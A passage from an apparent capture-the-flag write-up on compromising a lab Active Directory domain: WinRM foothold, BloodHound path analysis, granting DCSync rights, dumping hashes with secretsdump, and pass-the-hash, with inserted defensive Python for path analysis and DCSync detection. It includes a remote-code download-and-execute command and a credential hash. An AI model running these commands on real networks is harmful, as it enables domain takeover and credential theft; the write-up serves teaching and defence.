Now that we have the username/password svc-alfresco/s3rvice, we’ll use the Evil-WinRM script to gain an initial foothold on the box. This is only possible because the WinRM and WSMan services are open (refer to Nmap scan).

evil-winrm -i 10.10.10.161 -u svc-alfresco -p 's3rvice'

We get a shell!

Grab the user.txt flag.

Privilege Escalation

Enumerate the users on the domain.

Check the user privilege.

Enumerate the user account we are running as.

The user is part of the “Service Accounts” group. Let’s run BloodHound to see if there are any exploitable paths.

First, download SharpHound.exe and set up an SMB share in the directory it resides in.

python /usr/share/doc/python3-impacket/examples/smbserver.py tools .

In the target machine, copy the executable.

copy \\10.10.14.31\tools\SharpHound.exe .

Then run the program.

.\SharpHound.exe

This outputs two files.

We need to transfer the ZIP file to our Kali Linux machine. To do that, base64 encode the file.

certutil -encode 20200913135554_BloodHound.zip encoded.txt

Then output the base64 encoded file.

type encoded.txt

Copy it and base64 decode it on the Kali Linux machine.

echo -n '<base64 encoded string>' | base64 -d > bloodhound-result.zip

Now that we have the zipped file on our Kali Linux machine, we need to upload it to BloodHound. If you don’t have BloodHound installed on your computer, use the following command to install it.

apt install bloodhound

Next, we need to start up the neo4j database.

neo4j console

Then run bloodhound.

bloodhound

Drag and drop the zipped file into BloodHound. Then set the start node to be the svc-alfresco user.

Right-click on the user and select “Mark User as Owned”.

In the Queries tab, select the pre-built query “Shortest Paths from Owned Principals”.

We get back the following result.

From the above figure, we can see that svc-alfresco is a member of Service Accounts, which is a member of Privileged IT Accounts, which is a member of Account Operators. Moreover, the Account Operators group has GenericAll permissions on the Exchange Windows Permissions group, which has WriteDacl permissions on the domain.

Let’s break it down.

  • svc-alfresco is not just a member of Service Accounts but, through nested membership, is also a member of the groups Privileged IT Accounts and Account Operators.
  • The Account Operators group grants limited account creation privileges to its members. Therefore, the user svc-alfresco can create other users on the domain.
  • The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows them to directly modify group membership. Since svc-alfresco is a member of Account Operators, it can modify the membership of the Exchange Windows Permissions group.
  • The Exchange Windows Permissions group has WriteDacl permission on the domain HTB.LOCAL. This permission allows members to modify the DACL (Discretionary Access Control List) on the domain. We’ll abuse this to grant ourselves DCSync privileges, which will give us the right to perform domain replication and dump all the password hashes from the domain.

Putting all the pieces together, the following is our attack path.

  1. Create a user on the domain. This is possible because svc-alfresco is a member of the Account Operators.
  2. Add the user to the Exchange Windows Permissions group. This is possible because svc-alfresco, through Account Operators, has GenericAll permissions on the Exchange Windows Permissions group.
  3. Give the user DCSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
  4. Perform a DCSync attack and dump the password hashes of all the users on the domain.
  5. Perform a Pass the Hash attack to get access to the administrator’s account.
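The path BloodHound draws, and the five steps above, are a graph search: start at the owned user, follow MemberOf edges and the ACL rights that give control of the next node, and stop when you reach the domain object. The added example below (not the write-up’s code and not BloodHound’s) performs that search over a constructed edge list that reproduces the relationships described above; the sebastien / Domain Users edges are added only as a negative case. Run from the defender’s side with a full export, the same search answers the useful question: which principals other than domain admins can reach the domain object at all.

```python
"""Shortest control path from a principal to the domain object, BloodHound-style."""
from collections import deque

# Constructed edge list reproducing the relationships shown in the write-up.
# Group names are as BloodHound displays them on this box; the last two edges
# are made up to give a principal with no path.
EDGES = [
    ("svc-alfresco", "MemberOf", "Service Accounts"),
    ("Service Accounts", "MemberOf", "Privileged IT Accounts"),
    ("Privileged IT Accounts", "MemberOf", "Account Operators"),
    ("Account Operators", "GenericAll", "Exchange Windows Permissions"),
    ("Exchange Windows Permissions", "WriteDacl", "HTB.LOCAL"),
    ("sebastien", "MemberOf", "Domain Users"),
    ("Domain Users", "MemberOf", "Users"),
]

# Edge kinds that let the source act as, or take control of, the target.
TRAVERSABLE = {"MemberOf", "GenericAll", "WriteDacl", "WriteOwner", "Owns"}


def build_graph(edges):
    """Adjacency list keeping only edges that confer control."""
    graph = {}
    for src, kind, dst in edges:
        if kind in TRAVERSABLE:
            graph.setdefault(src, []).append((kind, dst))
    return graph


def paths_to(graph, start, target):
    """Breadth-first search; returns the shortest path as (node, edge, node) triples,
    or None when the target is unreachable."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for kind, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [(node, kind, nxt)]))
    return None


def principals_reaching_domain(edges, domain, candidates):
    """Map each candidate that can reach the domain object to its shortest path."""
    graph = build_graph(edges)
    result = {}
    for principal in candidates:
        path = paths_to(graph, principal, domain)
        if path is not None:
            result[principal] = path
    return result


if __name__ == "__main__":
    found = principals_reaching_domain(EDGES, "HTB.LOCAL", ["svc-alfresco", "sebastien"])
    for principal, path in found.items():
        print(principal)
        for src, kind, dst in path:
            print(f"  {src} --{kind}--> {dst}")
```

Every edge on the printed path is a remediation point: removing Service Accounts from Privileged IT Accounts, or dropping the Exchange Windows Permissions group’s WriteDacl on the domain object, both make the search return None for svc-alfresco.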

Alright, let’s get started.

Create a user on the domain.

net user joshua password /add /domain

Confirm the user was created.

Add the user to the Exchange Windows Permissions group.

net group "Exchange Windows Permissions" /add joshua

Confirm the user was added to the group.

Give the user DCSync privileges. We’ll use PowerView for this. First download PowerView and set up a Python HTTP server in the directory it resides in.

python3 -m http.server 80

Then download the script in the target machine.

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/PowerView.ps1')

Use the Add-DomainObjectAcl function in PowerView to give the user DCSync privileges.

$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\joshua', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity joshua -Rights DCSync

On the Kali Linux machine, use the secretsdump Impacket script to dump the password hashes of all the users on the domain.

impacket-secretsdump htb.local/joshua:password@10.10.10.161

We get back the following result.
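The replication request secretsdump makes here is, to the domain controller, a normal directory access and is audited as Event ID 4662 (with Directory Service Access auditing enabled): Access Mask 0x100 (control access) and a Properties field naming the replication control-access rights by GUID. Domain controllers replicate all day; a user account doing it is the alert. The added example below, not from the write-up, applies that rule to constructed 4662 records; the GUIDs are the real schema values for the replication rights, the set of known DC accounts is an assumption, and joshua is the account created in this write-up.

```python
"""Detect replication (DCSync-style) requests by non-DC principals in Event ID 4662."""
import re

# Control-access right GUIDs for directory replication, from the AD schema.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 Access Mask
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

# Assumption for this example: only the DC machine account is expected to replicate.
KNOWN_DC_ACCOUNTS = {"FOREST$"}

# Constructed 4662 records, not real logs from the box. The Properties field is
# reduced to its GUID list; the third record carries an unrelated GUID.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "SubjectDomainName": "HTB",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "joshua", "SubjectDomainName": "HTB",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "joshua", "SubjectDomainName": "HTB",
     "AccessMask": "0x20",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_used(event):
    """Names of the replication rights referenced in the event's Properties."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def dcsync_alerts(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return one alert per 4662 control-access event using replication rights
    from a principal that is not a known domain controller."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights_used(ev)
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject in known_dcs:
            continue  # DC-to-DC replication is expected traffic
        alerts.append({"subject": ev["SubjectDomainName"] + "\\" + subject,
                       "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in dcsync_alerts(SAMPLE_EVENTS):
        print(alert)
```

Get-Changes-All is the right that returns secret attributes, so an alert naming it deserves the same response as a confirmed credential dump: the principal’s ACE on the domain object was added (the Add-DomainObjectAcl step above), and the domain DACL should be diffed against a known-good baseline to find it.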

Use pth-winexe to perform a pass-the-hash attack with the Administrator’s hash.

pth-winexe --system -U htb/administrator%aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 //10.10.10.161 cmd.exe

We get a shell!

Grab the root.txt flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-). I will plan to do something new in the future write-ups. Probably I will do write-ups for TryHackMe challenges.

Joshua Surendran

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.